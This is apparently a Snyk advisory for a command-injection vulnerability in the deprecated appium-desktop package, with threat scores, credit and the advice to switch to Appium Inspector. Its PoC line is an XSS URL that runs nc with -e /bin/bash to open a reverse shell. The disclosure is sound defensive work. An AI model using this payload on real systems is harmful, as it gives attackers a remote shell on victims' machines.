Command Injection Affecting appium-desktop package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
96.19% (100th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-APPIUMDESKTOP-5491470
- published 3 May 2023
- disclosed 3 May 2023
- credit Aden Yap Chuen Zhen
How to fix?
There is no fixed version for appium-desktop
.
Overview
appium-desktop is a Graphical interface for the Appium server, and an app inspector
Affected versions of this package are vulnerable to Command Injection due to improper user-input sanitization by allowing an attacker to set-up a reverse shell.
Note: This library is deprecated and users should switch to Appium
and the Appium Inspector
instead.
PoC
http://127.0.0.1/?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>
References
CVSS Scores
version 3.1